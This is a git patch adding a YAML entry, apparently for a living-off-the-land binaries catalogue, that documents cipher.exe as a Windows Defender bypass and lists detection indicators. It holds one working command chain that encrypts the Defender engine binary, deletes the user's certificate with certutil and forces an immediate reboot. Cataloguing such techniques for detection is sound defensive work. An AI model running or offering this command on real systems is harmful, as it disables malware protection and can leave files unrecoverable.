From 87ee870023b7344be3b93e1e3706425aab56a5c3 Mon Sep 17 00:00:00 2001
From: Alexander Sennhauser <as@conitrade.com>
Date: Mon, 9 Jan 2023 11:00:40 +0100
Subject: [PATCH] document cipher.exe usage to disable services

---
 yml/OSBinaries/Cipher.yml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 yml/OSBinaries/Cipher.yml

diff --git a/yml/OSBinaries/Cipher.yml b/yml/OSBinaries/Cipher.yml
new file mode 100644
index 0000000..230dbb8
--- /dev/null
+++ b/yml/OSBinaries/Cipher.yml
@@ -0,0 +1,25 @@
+---
+Name: Cipher.exe
+Description: Security Tool for the Windows Encrypting File System
+Author: Alexander Sennhauser
+Created: 2023-01-09
+Commands:
+  - Command: cipher.exe /e "C:\ProgramData\Microsoft\Windows Defender\Platform\*\MsMpEng.exe" & certutil.exe -delstore -user my %username% & shutdown.exe /r /t 0
+    Description: Encrypt the Windows Defender binary to disable the service after a system restart.
+    Usecase: MSFT Defender bypass using LOLBINs
+    Category: Tamper
+    Privileges: Admin
+    MitreID: T1562
+    OperatingSystem: Windows 10 All
+Full_Path:
+  - Path: c:\windows\system32\cipher.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC: cipher.exe spawned with unusual path arguments
+  - IOC: certutil.exe spawned to delete user certificates
+Resources:
+  - Link:
+Acknowledgement:
+  - Person: Alexander Sennhauser
+    Handle: '@conitrade'